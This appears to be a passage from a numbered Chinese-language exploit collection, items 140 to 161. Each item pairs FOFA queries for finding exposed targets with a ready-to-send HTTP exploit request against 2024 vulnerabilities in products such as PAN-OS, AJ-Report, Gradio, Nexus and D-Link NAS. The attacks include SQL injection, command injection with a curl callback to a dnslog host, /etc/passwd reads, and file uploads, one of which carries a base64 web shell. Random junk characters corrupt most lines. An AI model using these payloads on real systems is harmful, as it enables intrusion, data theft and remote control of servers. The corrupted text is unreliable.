User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.06 H8 }) ?3 H8 _% U8 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 W2 P: k% f% q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& F6 f0 s4 ?0 l3 @Accept-Encoding: gzip, deflate, br. `5 t; T" Z2 E+ q: |3 h
Connection: close
$ _( [5 W1 [% J; e4 U( r. o9 nCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
( `' E3 A% v+ \' ~Upgrade-Insecure-Requests: 1
& {0 X4 k) k8 @. o: P. w" I7 o$ f: u- P
$ J! s6 ]- z; x% q
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入& r [/ [8 D" r `8 X
CVE-2024-2566% ?2 {$ U) F% K- ]: F
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
) c6 i) x2 w' r5 o% }3 }3 B# rGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1( i! k7 s- Y! m$ C, ^
Host: x.x.x.x0 t7 d; k6 o) a& n+ i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 b6 h! p/ H2 P! i; ^4 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 j: j7 r [) O! b1 `% _; A A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 m$ m. {+ \) e8 `1 p: }8 X3 NAccept-Encoding: gzip, deflate, br$ E, ]" h7 G7 y Q* T
Connection: close
9 h2 X% n; p5 [# q4 i5 z! ZCookie: authcode=h8g95 }$ k- V' I, H: Y( W" x
Upgrade-Insecure-Requests: 1' X8 s* l2 a" F* B* ?: H y: Q
# `6 u; H+ D& u' f
9 R6 Y4 Y! Y' Y; u. g5 w% a E, Z! \) m
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入. s/ x- Z% b, g) i
FOFA:body="指挥调度管理平台"
, @+ r) t% u2 E7 z* r6 l* ZPOST /app/ext/ajax_users.php HTTP/1.1
& B% [9 `: X7 i& ]% V" r2 dHost: your-ip9 K5 _/ n, t/ L8 [
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
: S7 q0 B9 R( [2 QContent-Type: application/x-www-form-urlencoded8 B5 G) l% w; w l$ J; h" B o: P
: ~9 V/ ~( y$ O8 s' x* Z
+ D1 T5 M" j$ h( Jdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -3 }% S% [% J* g5 H' L: Z3 ?' y
# Y9 h k2 A. U; S4 b, y$ c0 G$ R
5 a2 k2 z+ }: s
142. CMSV6车辆监控平台系统中存在弱密码* ]0 Z" P# M# b" f6 u( d4 F4 B& p) X; o
CVE-2024-29666- _1 j: R( X5 P+ k: S( V
FOFA:body="/808gps/"
- E4 }2 R3 C# w+ D' o; u3 k/ Cadmin/admin4 L- {5 f/ J! d v6 e, y, I( E- W
143. Netis WF2780 v2.1.40144 远程命令执行+ @& s8 @ x7 ^* ?/ p
CVE-2024-25850
. R( ~. T6 B4 Y# U9 i/ r* EFOFA:title='AP setup' && header='netis'
) j6 f6 k/ k" n7 w# O' B% c0 gPAYLOAD' h& m1 p4 w( q+ K. r
! Q! L3 n5 M. l144. D-Link nas_sharing.cgi 命令注入
- m( x( ?8 q& A; |& H1 O% R' yFOFA:app="D_Link-DNS-ShareCenter"
% \* t' o$ P! y* h" Fsystem参数用于传要执行的命令3 b* [; t. A6 S* f
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
% `2 {5 y) o+ }! p% d2 [' s5 s* THost: x.x.x.x
: W+ e# O: S5 L, w" ~/ oUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
, W( F4 \) Y' p+ ` U+ }4 rConnection: close* H, r5 o' S$ G% g% z( z: w; N
Accept: */** |- V! w' M9 e1 A6 ?
Accept-Language: en$ _' R- R, V) ^2 N* Z1 q# P9 w
Accept-Encoding: gzip& c8 T$ y" ^! w3 C( e! Z' N
3 Z# I: L; C7 X
$ s$ i# Q$ G% E& r; {5 O145. Palo Alto Networks PAN-OS GlobalProtect 命令注入& m. U* l& d/ F) F5 f
CVE-2024-3400
1 ^6 f& F: o- J' u! |0 DFOFA:icon_hash="-631559155"! m1 r+ z- D$ {( r
GET /global-protect/login.esp HTTP/1.1
( N# m$ m+ V" XHost: 192.168.30.112:10052 J( b, C) E# n& S4 }. l" v, D7 C+ a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
8 U5 f% }9 q! U0 e& WConnection: close( R+ b% ], t9 b
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
% |& y: ?! K" h/ z& t/ ?! oAccept-Encoding: gzip/ |5 O ^7 l+ e' `* Y. u3 c# E
6 E- g/ S) k! F: _/ ~4 f3 Q, o# |9 U" z. s6 @6 U ?5 [9 h
146. MajorDoMo thumb.php 未授权远程代码执行
7 y# V& t7 A$ f8 N3 Q1 N( q0 qCNVD-2024-021755 a/ ^3 N( E2 j8 N# u
FOFA:app="MajordomoSL"" s4 K1 y! |( G( @! K) [
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.15 @$ x3 o) p. f: b) f0 V$ x( W: S
Host: x.x.x.x: ~- z9 |% p% J% G r! Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
' }. ]+ ?: r! q' P0 CAccept-Charset: utf-8/ G9 y+ W& n, z1 N C9 O- D
Accept-Encoding: gzip, deflate: g, f/ F0 T# y+ _
Connection: close! `+ V5 H6 `: c/ X4 P; J
6 [) }* y4 p6 O+ { \9 M* h
/ Z5 t3 ~9 _8 F+ \2 w147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
. n! `8 t( Q$ U) RCVE-2024-32399
% P9 y% ^, \7 K/ v* xFOFA:body="RaidenMAILD"
6 C4 ]1 n# f" [) U5 [. `GET /webeditor/../../../windows/win.ini HTTP/1.1
1 \5 V1 X) ~) H# J3 z8 i) }Host: 127.0.0.1:81
5 o( Q X& n( E; Z; c% w0 RCache-Control: max-age=0( G2 a% D# o3 Y J' _% y' e* A
Connection: close. N% l3 m* b2 k9 u, \
+ D+ L+ {& H3 ^1 }6 h% G9 w7 ?3 v! G
148. CrushFTP 认证绕过模板注入0 q2 I. b1 s, `( t Q' |* G
CVE-2024-4040
8 {9 P/ \" U) I. L7 ?FOFA:body="CrushFTP"9 O: r- u; h9 N; n5 l! J! e6 ]/ Z* P- y, }
PAYLOAD
$ l& H" r# w* p& C6 c7 g$ w U4 B1 S6 B
149. AJ-Report开源数据大屏存在远程命令执行
- W3 M/ \$ F0 o+ A" v3 ^. M! zFOFA:title="AJ-Report"3 S1 p2 \- N. [# ?- t
V4 ~) b+ e/ v& K5 ^0 uPOST /dataSetParam/verification;swagger-ui/ HTTP/1.13 m) I" `. S9 F5 p$ y
Host: x.x.x.x
- y8 o9 O, E5 b. `* ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) ~2 S" ]/ d/ L8 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 v) R8 [" {' z" B, g0 Z" Y' S
Accept-Encoding: gzip, deflate, br2 U' B/ z, e9 \/ j1 s
Accept-Language: zh-CN,zh;q=0.9
9 Y5 j! M' y* F/ Y- ~Content-Type: application/json;charset=UTF-86 t6 f% j3 s3 a/ W: f
Connection: close) T8 i6 q6 C; F
s H2 s. I- k$ s- F- H+ h( G! Z
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}4 L% w/ U% w' I% d3 L! E, G7 A
. @; {, B# w5 i1 h5 _+ |: c
150. AJ-Report 1.4.0 认证绕过与远程代码执行
8 _3 k+ ~& L; d% _* X" FFOFA:title="AJ-Report"
+ u' g1 _3 @1 H6 E& L% X9 `POST /dataSetParam/verification;swagger-ui/ HTTP/1.16 ~" d3 u# y9 t1 y2 b1 |- f
Host: x.x.x.x
# n/ J0 k$ _; p( ^1 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: r9 Z& m ?: e2 V Z. F# w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. w+ J/ n* B" f1 c' v5 o) R: B. z
Accept-Encoding: gzip, deflate, br+ b5 V( I* f7 G( e
Accept-Language: zh-CN,zh;q=0.9
) g5 S* m: c ^Content-Type: application/json;charset=UTF-8* R1 N Z4 T) j- L1 \( g; K
Connection: close
3 F! B: c; A8 ?6 M2 gContent-Length: 3397 y, o& B3 f* x/ X' n4 P4 R0 [ x
# K1 T% g: {9 R- ~
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}# Q2 v+ h+ w _$ h
, S1 x3 R& \0 I+ z# s
. q- Y! x% X) }
151. AJ-Report 1.4.1 pageList sql注入/ h7 x2 y# h% x Z( v+ d
FOFA:title="AJ-Report"
" K' p5 W, ]+ e% G0 M6 Y/ f! [& H- ]% cGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.16 `) N1 s8 W/ s. Y
Host: x.x.x.x
5 y7 K% I9 | a) x0 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ a0 i; W3 v6 h3 J4 h) M
Connection: close
* u1 D2 M% X% y7 VAccept-Encoding: gzip
% J6 X( ~. Z: }$ F4 U( @0 i( \* c5 Y/ u4 X8 q0 a6 V
x/ L+ D+ a2 C8 ^# @152. Progress Kemp LoadMaster 远程命令执行
& O' X( w+ c' K6 {CVE-2024-1212
( O! ~% M: N0 N3 b7 X) B5 SLoadMaster <= 7.2.59.2 (GA)) S( K S. [1 R/ p% M
LoadMaster<=7.2.54.8 (LTSF)2 P" C; @8 z5 Z
LoadMaster <= 7.2.48.10 (LTS)
+ Y# t) z* o' o" n, @- ^FOFA:body="LoadMaster"
% c+ N T6 n: P( K1 J1 F z8 I9 PJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码8 g- n6 E& R' }$ L( c
GET /access/set?param=enableapi&value=1 HTTP/1.1
8 t1 \' b3 \: E% N# M! ~- z+ {* \Host: x.x.x.x0 c7 i8 p1 b% u8 C5 z1 l0 W2 B3 c* D: i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1. v. @5 \8 }% ?
Connection: close
7 q$ p1 S4 h# y9 eAccept: */*9 M n0 f& k4 L) z: h
Accept-Language: en- f" ]& N" `( H% N9 } \8 v
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
/ s; S t" e$ {$ [! u! aAccept-Encoding: gzip3 G7 q8 a1 t5 A3 j# a9 }
1 g# \% i7 X7 @0 i! f& q: m$ I7 y8 E: F
" D5 C, v* N! q6 O. T: P" F153. gradio任意文件读取
& c! A1 T6 \5 ACVE-2024-1561FOFA:body="__gradio_mode__"$ @ E+ ^0 u: t6 J x, Q
第一步,请求/config文件获取componets的id" H! a3 K7 F" c5 r, k4 M7 m5 P
http://x.x.x.x/config
' @8 z0 o' g! N/ o' k. C0 @* B$ j( Z& M
7 ?$ [! e! g ]% I7 {* j4 B第二步,将/etc/passwd的内容写入到一个临时文件# m! m6 P2 R& |. r, z, u
POST /component_server HTTP/1.1
' U4 a/ x2 c2 |" T# RHost: x.x.x.x
" j9 q# B3 [ p! g" d: z2 O% }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.33 `- R, u" o& n6 M6 I$ w- L# o# Q
Connection: close
* ~1 d E7 L! S& ?2 k: _Content-Length: 115& f0 [$ U8 N) E5 h- x: `
Content-Type: application/json1 r J/ o1 c- h9 `0 \1 Z
Accept-Encoding: gzip
( l0 v. M4 h5 o T1 W7 n
( s6 s/ ]* _6 ^3 \( d9 t7 W{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
7 T# {' Q2 L' Y: T1 Q8 P7 x# B8 ]& \+ y0 p1 {) P
$ x% S# k6 Q8 H& h1 u' c1 N
第三步访问 @7 }( Y$ z( B/ E+ O
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd( v% s) X, ~. H( Z" j
' v5 @) Z- V& D% V2 y9 s) x% ~ x
154. 天维尔消防救援作战调度平台 SQL注入
6 ^+ p8 ?7 d% J' U( K- {CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"& U" ^9 t1 j+ n4 I7 V- O9 F
POST /twms-service-mfs/mfsNotice/page HTTP/1.1" v2 O; N: T% w4 Q- s& o
Host: x.x.x.x% C6 N8 V1 n: P5 i3 x1 b8 z l
Content-Length: 106, ~' v9 T4 D1 Y7 p, Q
Cache-Control: max-age=0
0 ]0 o% V |- L* P* [0 ~Upgrade-Insecure-Requests: 1- X/ O( b* ]! n% v/ { o3 o4 B
Origin: http://x.x.x.x1 E! P. B0 C) w/ G7 j) o+ i, r
Content-Type: application/json
, n. ^" q* |1 S& [ ^3 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36; o3 X e/ a% }6 x0 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ {, D$ v7 w: x$ K! ` k/ ~1 w9 tReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
6 [# Q8 j; [7 F/ Q7 b% ZAccept-Encoding: gzip, deflate
/ L! i. ] d; g+ w9 mAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
% g+ }# K' E0 ~( N2 wConnection: close! h$ }1 D: p4 b. L$ M3 v& s
4 ]' u; j5 L7 P6 K; D. A
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}# ~1 A6 p2 \( }# B8 I9 c% N8 [
9 m; f) s; q l6 [2 r! ?( C" j0 [- ?0 y" o9 b
155. 六零导航页 file.php 任意文件上传! z7 h3 l5 M% g% U) l) K5 g: \
CVE-2024-34982
# u% q k+ f% O0 P' G9 EFOFA:title=="上网导航 - LyLme Spage"" N) e1 I, b1 X# w) n
POST /include/file.php HTTP/1.1 q0 A' e+ X/ k: f4 ?
Host: x.x.x.x
) q8 c; l' \* W7 n5 f; M7 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0% e0 ?7 N& c; Y; G) P
Connection: close/ s) E2 ?* [8 r
Content-Length: 232* |9 B' d' a, W' Y5 ]
Accept: application/json, text/javascript, */*; q=0.01
! v8 d" d6 T8 I' g4 CAccept-Encoding: gzip, deflate, br- w# a; h& |/ K/ N k- j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ^) o5 ^# D/ k4 _# NContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f" w& l, C, u% ~( x* R w, @0 ^
X-Requested-With: XMLHttpRequest
$ | h, P* v8 C" I% i. u0 L: J/ n' j6 U
-----------------------------qttl7vemrsold314zg0f
5 L2 J8 y. V& O& v& fContent-Disposition: form-data; name="file"; filename="test.php"4 D- Y9 ^0 y5 v2 w+ k7 @& i4 t5 n
Content-Type: image/png
- E& W3 e" B7 N$ b5 c" B* g9 r& n& x+ {: W5 w! A
<?php phpinfo();unlink(__FILE__);?>/ @$ V5 {* a4 E, w( ^% N$ w
-----------------------------qttl7vemrsold314zg0f--
! S0 I1 {" r3 Q9 {: X/ E' F$ `. ?" ?0 e' A/ u, b6 F
9 @) U6 j; H! O5 [1 |: |
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php1 J6 o# l# X' M1 I0 e# _
' n% C4 o- m8 G$ q7 _8 K156. TBK DVR-4104/DVR-4216 操作系统命令注入2 E& D8 m& I& e. w; i, p. P+ P
CVE-2024-3721
/ v1 D6 B9 g9 W1 ^FOFA:"Location: /login.rsp"
9 B* ` V+ a% Z5 l) H, K& [- {·TBK DVR-4104
7 y. @* D7 y# V9 s# T4 t·TBK DVR-4216
/ }; F6 S- a' g* a- Ccurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
( z/ q, U2 R+ F
# }- }1 e+ r; L) T* J3 o/ Q* m* R8 _7 l& N! N3 F) C+ |. N
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.15 Y& T6 z" k3 I! Z
Host: x.x.x.x6 e, \: c5 u3 t3 C3 I* C3 ]
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, [% L# ]& @( z" K/ t y; @% UConnection: close
) b% x3 E; I; p$ Z. \5 s: n+ GContent-Length: 0
n- p& i9 Y0 UCookie: uid=1
. Z1 A3 j/ B8 M6 w, ZAccept-Encoding: gzip
& n+ U2 |1 Y5 J) E# [
1 X3 G" C( z" C& W. a3 G' {, e5 u: \/ ^5 f+ v* A; U
157. 美特CRM upload.jsp 任意文件上传2 [& |, A- ^* g" C1 ?( T! m
CNVD-2023-06971, M3 h' o/ c5 s# H f% w, i
FOFA:body="/common/scripts/basic.js"
w6 O @, U7 d0 wPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
' E$ ^% w: t$ W" z5 SHost: x.x.x.x q9 Q2 v$ h2 A9 u0 ]1 ?9 K/ r% R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.362 F8 v3 N/ y0 b( l0 a: Y( C
Content-Length: 709
" f X, b5 e5 z& u) TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( q9 {* M# [; X" GAccept-Encoding: gzip, deflate5 z. Q5 {1 ?* Z ~7 s
Accept-Language: zh-CN,zh;q=0.9' y; b- [5 `6 ?" M4 \
Cache-Control: max-age=0
4 T. t) I0 O/ Y1 r6 ?7 mConnection: close
& {6 h6 M( s& b2 J/ T) v8 DContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
* g6 u4 {6 P* ?Upgrade-Insecure-Requests: 1
1 W9 @5 F5 H3 k5 }2 ^, T" m2 n6 z$ k7 |, ]7 V0 B. W( w/ z7 n
------WebKitFormBoundary1imovELzPsfzp5dN4 r' r3 _+ Y. S: {9 N$ b+ u
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"8 U4 z4 D7 {% ]& b
Content-Type: application/octet-stream3 P& M+ I2 W# K3 ?
% z4 c7 w4 }# Q& T0 Y
nyhelxrutzwhrsvsrafb! J+ a. z/ |% J
------WebKitFormBoundary1imovELzPsfzp5dN8 H! t. d/ C w2 {. s+ @
Content-Disposition: form-data; name="key"
4 P* ~. E \% s! a. z- n* _
" Z7 ^, ~ a) ] \null
' F$ I! h7 T W3 Q% L------WebKitFormBoundary1imovELzPsfzp5dN
; H) P' E1 D- _4 [$ x! ~5 oContent-Disposition: form-data; name="form"
2 `$ w s& P& A+ ~4 B
9 ^8 K2 h3 t0 F5 e2 H( E+ H7 Mnull9 M& n2 V2 U h% E. F- }
------WebKitFormBoundary1imovELzPsfzp5dN) O1 J1 y# q- p1 b, s4 k: L
Content-Disposition: form-data; name="field"
3 t/ y7 m3 x5 l( |/ g! [8 Y
4 h7 J2 d1 ]0 S0 j" H) Nnull/ D# [" L. E( T% s. k
------WebKitFormBoundary1imovELzPsfzp5dN
& r3 C+ {& t, P7 Z& A5 K4 v6 z# ~. JContent-Disposition: form-data; name="filetitile"9 z C$ a1 I5 n, U
% ~7 r( P! E5 p Q$ @ n
null* Y; n* Y8 M! _8 Z$ U9 J4 \
------WebKitFormBoundary1imovELzPsfzp5dN
; p, C( s$ f, |Content-Disposition: form-data; name="filefolder"
' N1 \9 I9 T# ^0 C; z3 O7 N. n: V
' @' @. [% N, B7 ~null
+ t* S( E& @' y% e7 \, h& _' N------WebKitFormBoundary1imovELzPsfzp5dN--
4 j5 _& h' D& q! s: I$ v, B: X. C3 `
" l) u( x- ]! W+ N/ K, i4 D
/ _4 l( a, V$ E2 ohttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp7 \: x( B' S5 L6 A# {
s+ G9 r! x, D$ N; A- {7 K
158. Mura-CMS-processAsyncObject存在SQL注入
% g- f, f8 X0 x+ RCVE-2024-32640# Y ~( b$ X0 X6 z
FOFA:"Generator: Masa CMS"
8 ^) r* U7 L, U5 |1 o# |POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1+ s$ c+ J' F: I# I6 T
Host: {{Hostname}}
8 \/ d* n: }7 zContent-Type: application/x-www-form-urlencoded
) @: h9 u6 O/ y* ~
9 G* p, D$ g. B, U$ H" Sobject=displayregion&contenthistid=x\'&previewid=1: V& B, y0 J; e0 [1 D+ b# S7 t% A
2 P7 s$ E7 v7 G; c, r+ L# k& c
" u" F& z9 _9 V a3 `159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
4 i9 X% B9 V4 ?$ c8 Y! LFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
- u6 b l4 A3 C9 t& V4 X5 YPOST /webservices/WebJobUpload.asmx HTTP/1.1
- Z. r/ V$ L6 B. |; f4 q E* `Host: x.x.x.x6 F5 U4 w' K6 X- D, O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36) R- w+ L- b( |. u4 ]
Content-Length: 1080
: H% y% d2 m! E4 o( ]3 WAccept-Encoding: gzip, deflate
- N0 y! n3 C( T5 \- |; |Connection: close
' r' `3 K9 E' T( _Content-Type: text/xml; charset=utf-82 S( _8 ^; b+ U! ^) j2 n4 d
Soapaction: "http://rainier/jobUpload"0 S0 q" O3 @) W8 H. ~6 f; z
- w& ^3 I& k" Z
<?xml version="1.0" encoding="utf-8"?>% G1 w0 I! Y" H& @0 l2 Y- |) Z4 w
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' j* v6 {5 e) l4 a8 d
<soap:Body>
' ^3 m0 c- V5 ]" `6 Y6 G<jobUpload xmlns="http://rainier">: a2 `# @, P$ i* c
<vcode>1</vcode>9 X$ z9 b7 d+ k* l, f
<subFolder></subFolder>
! P# x4 p, S# R+ `<fileName>abcrce.asmx</fileName>
6 Q1 \0 E+ S+ r w<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>0 @, C' N- x6 k+ N3 ^) z9 P
</jobUpload>
7 Q! o! A. R, W# O9 g! g) k# F0 B</soap:Body>
9 S$ W# D% N: K</soap:Envelope>/ x+ E+ E- d, K- J- ]
+ X$ t E( a% g
9 ~/ C% g8 I2 X3 l0 V
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")7 v0 N8 T* W v
+ Z4 m( B7 ` {: m' c$ e- Q7 R
; f, K B6 t/ V7 ^- P6 [" L2 w# `160. Sonatype Nexus Repository 3目录遍历与文件读取
- _# a- I% p w- j& GCVE-2024-4956
# A/ A& D2 C9 B1 l+ _FOFA:title="Nexus Repository Manager"* L( b* Y, u9 j6 B( Z& ]" @; ]7 R
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1' s% N7 Q. f; X! `
Host: x.x.x.x
! L& y6 z5 T0 G4 `7 s9 \+ _User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0 Z' Q# G" D# f& b( R2 u
Connection: close1 R/ ]# y5 D6 x1 G1 B
Accept: */*
0 ^, t2 s) L, Z2 I$ G3 k7 YAccept-Language: en# m( U+ D* Y; O) u* m* t
Accept-Encoding: gzip
+ f2 D7 P W' K9 T9 ^: Q& z' f, }+ l+ [4 N: p' r& F) r+ S
4 i( E5 D+ n$ W; h( c, u Y1 U161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传5 B* ?& R4 p* B' q! q* i
FOFA:body="/KT_Css/qd_defaul.css") j1 M, P0 A8 o9 ^. [- s6 y3 J! U
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密1 [3 `; j( B! A. F' W
POST /Webservice.asmx HTTP/1.1, D' H" n9 M8 ]3 I2 ^
Host: x.x.x.x( ^9 G# Y) E- x1 \0 j# a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 ?% ~0 a, ^* s: x3 ~1 @; f
Connection: close# j% U. v4 M6 v' j% _. }
Content-Length: 445& k2 D* z; v( q; w& s
Content-Type: text/xml0 W/ F" |; r5 F" W
Accept-Encoding: gzip$ m' p; F3 E; J' N! h" y
' S- r% }3 M: D0 f) x1 J( w<?xml version="1.0" encoding="utf-8"?>" D( y8 N. X! ?4 |+ a
<soap:Envelope xmlns:xsi="
/ R \$ ~* v3 x9 Lhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"! k+ i+ d! J% |9 `# P" ~1 A3 k
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* E' n. h, W5 w) A2 e' F<soap:Body>
) K+ I. ~/ V7 R0 S: p<UploadResume xmlns="http://tempuri.org/">" n6 g) A& q6 A; E3 s; \! o. j8 S5 r4 H
<ip>1</ip>
: j4 a9 i) K( r( u* W0 b<fileName>../../../../dizxdell.aspx</fileName>
